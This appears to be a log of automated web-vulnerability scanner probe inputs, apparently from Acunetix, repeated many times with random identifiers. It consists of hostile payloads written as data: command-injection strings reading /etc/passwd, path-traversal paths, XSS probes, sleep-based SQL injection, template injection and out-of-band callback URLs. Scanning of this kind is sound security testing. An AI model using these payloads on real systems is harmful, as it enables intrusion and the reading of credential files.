
SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

[url=http://www.acunetix.com]website security[/url]

|cat /etc/passwd#

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1_4k0SD <ScRiPt >prompt(968962)</ScRiPt>

1&n981922=v983708

-1))

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

lU578lr3'

1

!(()&&!|*|*|

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

1

'

^(#$!@#$)(()))******

1

u28Nld8y')

1

1

/etc/passwd

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

n9grS2Hi'))

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

1

http://hitAlS1hgBorJ.bxss.me/

-1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

http://www.acunetix.tst

-1)

1

1

1

1

1

comments

'&dir&'

file:///etc/passwd

1

-1))

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(911194)</ScRiPt>

comments

"&dir&"

1

1

AaBWaK58'

|dir

comments/.

'"()&%<ScRiPt >prompt(975567)</ScRiPt>

<!--

WEB-INF/web.xml

1

hNo0eMDf')

1

'|dir

1

1

1

1_926507

1

"|dir

WEB-INF\web.xml

mdfWI1wU'))

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu9794\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9794

1

../../../../../../../../../../boot.ini

1

1

acux3894\xc0\xbez1\xc0\xbcz2a\x90bcxuca3894

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(949097)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(901018)</script>

................windowswin.ini

1

1<ScRiPt >prompt(927989)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901652></ScRiPt>

1

1

1<ScRiPt >prompt(991756)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(962623)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9191840*9955378)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(916619)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(930469))>

'+response.write(9191840*9955378)+'

1

&cat /etc/passwd&

"+response.write(9191840*9955378)+"

1

1<iframe src='data:text/html

1

1

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<body onload=prompt(940151)>

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916326)>

1

-1

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

cat /etc/passwd

1<img src=xyz OnErRor=prompt(991188)>

${99658+99509}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1<img/src=">" onerror=alert(975697)>

`cat /etc/passwd`

-1))

1

1&n947116=v957478

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

LvlkRVNA'

|cat /etc/passwd#

)

1<ScRiPt%20>prompt(915858)</sCripT>

1

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

H08CEVOw')

1

1&lt

!(()&&!|*|*|

'|'ld

'"()

uq5fkl58'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"|"ld

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(976387) //\xf6>

1

'

1

1

/etc/passwd

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1<input autofocus onfocus=prompt(902209)>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1

'

1

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitWcZUPe6zB1.bxss.me/

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

1

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

uUGjHLsh'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

||cat /etc/passwd

1

comments

1

1

&dir

1_Gxhhq <ScRiPt >prompt(919327)</ScRiPt>

1

WgaujJ1w')

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(973900)</ScRiPt>

comments

'"

1

'&dir&'

1

1

pZHQk4NA'))

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(906399)</ScRiPt>

1

"&dir&"

<!--

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1_960031

1

1

1

1

|dir

1

1

WEB-INF/web.xml

1

1

1

acu5768\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5768

1

'|dir

WEB-INF\web.xml

1

1

acux6059\xc0\xbez1\xc0\xbcz2a\x90bcxuca6059

1

../../../../../../../../../../windows/win.ini

"|dir

1

1<ScRiPt >prompt(949459)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(900437)</script>

1

1

1<ScRiPt >prompt(985001)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925221></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(956845)</ScRiPt>

1

1

................windowswin.ini

1

1

1

1<video><source onerror="javascript:prompt(901696)">

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920037)"></g></svg>

1

1

1

1<div style=width:expression(prompt(920602))>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<iframe src='data:text/html

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<body onload=prompt(975227)>

1

response.write(9691776*9431323)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

&cat /etc/passwd&

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(937831)>

1

'+response.write(9691776*9431323)+'

1

1<img src=xyz OnErRor=prompt(950139)>

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(910217)>

1

"+response.write(9691776*9431323)+"

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(933062)</sCripT>

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd.jpg

1&lt

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(995209) //\xf6>

`cat /etc/passwd`

1

1

-1

1

1

1<input autofocus onfocus=prompt(952832)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

1&n900415=v987476

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99788+99904}

1

<a href='http://www.acunetix.com'>website security</a>

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

1

fbXmsoBh'

1_zqq4R <ScRiPt >prompt(937619)</ScRiPt>

testasp.vulnweb.com

'"()

!(()&&!|*|*|

/etc/passwd

1

26ATe2hc')

'

1

'

1

1

1

^(#$!@#$)(()))******

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

V4Mc68ra'))

1

"

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

1

1

'&dir&'

1

acunetix_wvs_invalid_filename

http://hitP6legfcK5O.bxss.me/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1))

"&dir&"

1

file:///etc/passwd

comments

1

1

1

1

Nt3aAfUc'

1

|dir

1'"()&%<ScRiPt >prompt(957339)</ScRiPt>

'"

/\../\../\../\../\../\../\../etc/passwd

comments

1

'|dir

MHoQs6x6')

1

'"()&%<ScRiPt >prompt(927132)</ScRiPt>

comments/.

WEB-INF/web.xml

<!--

1

"|dir

1

SC9W5vrk'))

1_961911

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu2917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2917

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux8391\xc0\xbez1\xc0\xbcz2a\x90bcxuca8391

1

1

1

1

1<ScRiPt >prompt(935709)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1<script>prompt(915101)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(996894)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?930527></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(978051)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(998285)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9590168*9702254)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939866)"></g></svg>

1

1

'+response.write(9590168*9702254)+'

1

1

1

1

1<div style=width:expression(prompt(911140))>

WEB-INF/web.xml

1

"+response.write(9590168*9702254)+"

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

WEB-INF\web.xml

1<body onload=prompt(969133)>

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939088)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(938549)>

${99529+99229}

1

1

1

-1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(911035)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n986844=v991307

|cat /etc/passwd#

1

-1)

)

1<ScRiPt%20>prompt(955358)</sCripT>

1

1

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

!(()&&!|*|*|

-1))

1

1&lt

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

MIXGudxV'

\xf6<img acu onmouseover=prompt(987467) //\xf6>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'

1<input autofocus onfocus=prompt(913367)>

aPn9kCHO')

'

1

/etc/passwd

1

1

1

"

1

"

1

O2P0CVbu'))

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

http://hitASZIXmM3Sn.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1_vtHyg <ScRiPt >prompt(945069)</ScRiPt>

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

comments

1

http://www.acunetix.tst

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

1

1

-1))

1

1

'"

"&dir&"

bVMcQWa9'

1

1'"()&%<ScRiPt >prompt(984950)</ScRiPt>

comments/.

1

file:///etc/passwd

|dir

<!--

1

qcRmWNlp')

1

1

'"()&%<ScRiPt >prompt(935593)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

xKi4F3RG'))

1

'|dir

1

WEB-INF/web.xml

1_944118

1

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu4662\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4662

1

../../../../../../../../../../boot.ini

1

1

acux1612\xc0\xbez1\xc0\xbcz2a\x90bcxuca1612

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(976115)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(920930)</script>

1

1<ScRiPt >prompt(995048)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990616></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(978174)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(921889)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(953277)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(924840))>

response.write(9266494*9083442)

1

1

1

1

'+response.write(9266494*9083442)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"+response.write(9266494*9083442)+"

1<body onload=prompt(984473)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911235)>

1

1

1

"&cat /etc/passwd&"

${99784+100387}

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(978651)>

1

1

cat /etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img/src=">" onerror=alert(916500)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(900411)</sCripT>

-1

1

1&n974934=v998579

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1&lt

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

-1)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

'|'ld

\xf6<img acu onmouseover=prompt(955738) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

^(#$!@#$)(()))******

1

'

"|"ld

1<input autofocus onfocus=prompt(959977)>

iXAF9l7d'

testasp.vulnweb.com

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

uFIpX0Xm')

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

3WIuT4m2'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_LXYlx <ScRiPt >prompt(921928)</ScRiPt>

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitmmr88OOUUH.bxss.me/

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

1

1

1

||cat /etc/passwd

comments

1

1

-1)

1

1

http://www.acunetix.tst

&dir

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

file:///etc/passwd

comments/.

1

1

'"

1

'&dir&'

1

vKE3npkr'

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1'"()&%<ScRiPt >prompt(961613)</ScRiPt>

1

dIDDo5R3')

"&dir&"

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(949706)</ScRiPt>

1

1

1

|dir

WEB-INF\web.xml

LMdJ6oXb'))

1

1_949536

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

"|dir

acu2117\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2117

1

../../../../../../../../../../boot.ini

1

1

1

acux9885\xc0\xbez1\xc0\xbcz2a\x90bcxuca9885

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(916719)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(944630)</script>

1

1

1

1<ScRiPt >prompt(964074)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931087></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(939828)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(986491)">

1

response.write(9275668*9517192)

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922813)"></g></svg>

1

1

'+response.write(9275668*9517192)+'

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(901848))>

1

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9275668*9517192)+"

1

../../../../../../../../../../etc/passwd

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

cat /etc/passwd

1<body onload=prompt(900248)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951826)>

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(950116)>

-1

1

1

1

${99412+99631}

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(989633)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1

'|'ld

1<ScRiPt%20>prompt(943601)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"|"ld

-1))

1

1&n931645=v997729

1some_inexistent_file_with_long_name%00.jpg

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

f8yAQCXP'

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(984653) //\xf6>

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

1

lrT1ar2n')

^(#$!@#$)(()))******

'"()

1<input autofocus onfocus=prompt(949154)>

bwVF9pLB'))

1

/etc/passwd

"

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

1

"

1

1

-1)

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

&dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

1_pjXWL <ScRiPt >prompt(907103)</ScRiPt>

1

1

1

acunetix_wvs_invalid_filename

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

6pS6YF2b'

http://hitplIdPKHL5a.bxss.me/

1

1

"&dir&"

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

JvvjZgh7')

1

1

1

1

1

|dir

http://www.acunetix.tst

1

aPHLRcb4'))

1

comments

file:///etc/passwd

'|dir

1

'"

1

comments/.

1

1

1'"()&%<ScRiPt >prompt(930551)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

<!--

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(911199)</ScRiPt>

1

1

1

1

1_984189

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

acu1113\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1113

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux7987\xc0\xbez1\xc0\xbcz2a\x90bcxuca7987

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(963624)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<script>prompt(922916)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(939457)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947818></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(938438)</ScRiPt>

1

1

1

response.write(9444848*9850190)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(963763)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967273)"></g></svg>

'+response.write(9444848*9850190)+'

&cat /etc/passwd&

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

"+response.write(9444848*9850190)+"

1<div style=width:expression(prompt(989780))>

'&cat /etc/passwd&'

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

-1

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

-1)

1<body onload=prompt(909265)>

cat /etc/passwd

